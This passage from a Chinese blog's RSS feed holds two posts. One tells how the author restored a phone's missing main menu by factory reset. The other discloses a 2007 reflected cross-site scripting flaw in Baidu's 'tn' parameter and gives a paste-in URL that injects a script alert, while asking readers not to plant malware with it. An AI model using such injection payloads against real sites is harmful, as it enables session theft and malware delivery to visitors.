			<content:encoded><![CDATA[<p>漫不经心的打开主菜单，天!竞只剩固定拨号，神州行，，几个图标!我的第一感觉就是中病毒啦?不太可能吧!一个小小的e2?难到是昨晚电用完时的非法关机。试着关机开机几遍都没作用。奇怪啦，快捷键都能用(可以重新设置，只能看见应用程序，看不见系统设置类的菜单!)，就是从主菜单没法找到!，最后终于在侧面语音功能中找到&#8221;复位&#8221;菜单，只有删除全部的复位功能把主菜单找回来啦，感谢ing，不过代价是短信，通信录等手机上存的资料统统丢失，内存卡上的软件要重新下过用设置依然。<br />明白啦e2安全密码是在手机复位时用到和锁定密码不同!</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/about/testing-phone-post-183/" rel="bookmark" title="Permanent Link: Testing phone post">Testing phone post</a></li><li><a href="http://clin003.com/technical-analysis/zhang-yi-limitations-of-using-a-mobile-phone-to-set-aside-pc-trojan-defense-authorization-546/" rel="bookmark" title="Permanent Link: 看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马">看到技术文章很稀奇——张翼：跳出PC局限用手机授权防御木马</a></li><li><a href="http://clin003.com/ideas/gmail-receive-a-text-message-with-a-password-reset-code-on-your-mobile-phone-2057/" rel="bookmark" title="Permanent Link: Gmail要求手机验证怎么办 (国家列表中没有China)">Gmail要求手机验证怎么办 (国家列表中没有China)</a></li><li><a href="http://clin003.com/safe/phone-sniffer-484/" rel="bookmark" title="Permanent Link: 手机嗅探扫描，窃&#8230;">手机嗅探扫描，窃&#8230;</a></li><li><a href="http://clin003.com/linux/fedora-11-to-fedora-12-upgrading-your-system-1846/" rel="bookmark" title="Permanent Link: Fedora 11 下硬盘安装(升级)到 Fedora 12">Fedora 11 下硬盘安装(升级)到 Fedora 12</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/e2-phone-menu-215/" >http://clin003.com/exploits/e2-phone-menu-215/</a> <br /> <a href="http://clin003.com/exploits/e2-phone-menu-215/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/e2-phone-menu-215/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>百度跨站漏洞：当前日期(date): 2007-11-24 星期六</title>
		<link>http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/</link>
		<comments>http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 08:45:28 +0000</pubDate>
		<dc:creator>白菜林</dc:creator>
				<category><![CDATA[安全]]></category>
		<category><![CDATA[推荐,内容]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://wz.mygogou.com/exploits/baidu-inter-station-loopholes-2007-11-24-196.shtml</guid>
		<description><![CDATA[百度跨站漏洞，小漏洞，大危害！ 影响版本： 当前日期(date): 2007-11-24 星期六 此漏洞属于跨站漏洞，希望大家不要利用此漏洞去挂马！ 直接复制下面的地址到IE浏览器中去看效果吧：(实验时自行去掉中间的空格) http://www.baidu.com/index.php?tn=&#8221;&#62;http://www.baidu.com/index.php?tn=&#8221;&#62;&#60; script&#62;alert(/wiki.mygogou.com/)&#60; /script&#62; 把这段代码中间的网址修改成我们的首页地址： http://www.baidu.com/index.php?tn=&#8221;&#62;http://wiki.mygogou.com=&#8221;&#62;&#60; script&#62;alert(/wiki.mygogou.com/)&#60; /script&#62; wiki地址：http://wiki.mygogou.com/doc-view-744.html  Related posts:腾讯体验中心跨站漏洞及利用想法百度搜索联盟广告跨站漏洞百度准备自杀啦？去除Office onenote 2007的激活验证和试用版标记百度的新年愿景Copyright &#169; 2007-2010 This feed is building by Lin's Space&#124;Only .本文地址：http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/ 雁过留言. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)]]></description>
			<content:encoded><![CDATA[<p>百度跨站漏洞，小漏洞，大危害！<br />
影响版本：<br />
当前日期(date): 2007-11-24 星期六<br />
此漏洞属于<a href="http://wiki.mygogou.com/doc.php?action=view&amp;title=%E8%B7%A8%E7%AB%99%E6%BC%8F%E6%B4%9E" class="innerlink">跨站漏洞</a>，希望大家不要利用此漏洞去挂马！</p>
<p>直接复制下面的地址到IE浏览器中去看效果吧：(实验时自行去掉中间的空格)<br />
http://www.baidu.com/index.php?tn=&#8221;&gt;http://www.baidu.com/index.php?tn=&#8221;&gt;&lt; script&gt;alert(/wiki.mygogou.com/)&lt; /script&gt;</p>
<p>把这段代码中间的网址修改成我们的首页地址：<br />
http://www.baidu.com/index.php?tn=&#8221;&gt;http://wiki.mygogou.com=&#8221;&gt;&lt; script&gt;alert(/wiki.mygogou.com/)&lt; /script&gt;</p>
<p><a href="http://wiki.mygogou.com/doc-view-744.html">wiki地址：http://wiki.mygogou.com/doc-view-744.html </a></p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://clin003.com/exploits/tencent-experience-center-loopholes-and-the-use-of-inter-station-idea-503/" rel="bookmark" title="Permanent Link: 腾讯体验中心跨站漏洞及利用想法">腾讯体验中心跨站漏洞及利用想法</a></li><li><a href="http://clin003.com/exploits/baidu-search-advertising-across-union-station-loopholes-792/" rel="bookmark" title="Permanent Link: 百度搜索联盟广告跨站漏洞">百度搜索联盟广告跨站漏洞</a></li><li><a href="http://clin003.com/ideas/baidu-ready-to-commit-suicide-1485/" rel="bookmark" title="Permanent Link: 百度准备自杀啦？">百度准备自杀啦？</a></li><li><a href="http://clin003.com/suggested-contents/office-onenote-2007-miyue-quchujihuoyanzheng-1963/" rel="bookmark" title="Permanent Link: 去除Office onenote 2007的激活验证和试用版标记">去除Office onenote 2007的激活验证和试用版标记</a></li><li><a href="http://clin003.com/baidu/baidu-2008-hope-261/" rel="bookmark" title="Permanent Link: 百度的新年愿景">百度的新年愿景</a></li></ul><hr /><small>Copyright &copy; 2007-2010<br /> This feed is building by <a href="http://clin003.com/">Lin's Space|Only</a> .<br />本文地址：<a href="http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/" >http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/</a> <br /> <a href="http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/#comment" title="to the comments">雁过留言</a>. (Digital Fingerprint: 850cee8la75i9f3ne9c0dd80e31392be)</small>]]></content:encoded>
			<wfw:commentRss>http://clin003.com/exploits/baidu-inter-station-loopholes-2007-11-24-196/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
